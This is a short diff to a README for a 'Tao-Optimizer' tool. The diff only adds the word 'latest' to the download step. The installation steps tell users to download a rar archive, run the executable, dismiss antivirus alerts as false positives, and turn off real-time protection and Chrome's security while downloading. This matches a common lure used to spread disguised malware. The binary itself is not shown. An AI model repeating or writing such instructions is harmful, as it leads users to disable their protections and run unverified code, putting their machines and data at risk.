taooptimization-spec/Tao-Optimizer/README.md

 ## Installation

-1. Download the rar file and run the executable.
+1. Download the **latest** rar file and run the executable.
 The executable does not necessarily require admin privileges.
 Download may prompt that it is a virus but it is false positive.
 Disable real-time protection and chrome's antivirus security temporarily, then re-enable it after the download finishes.

 ---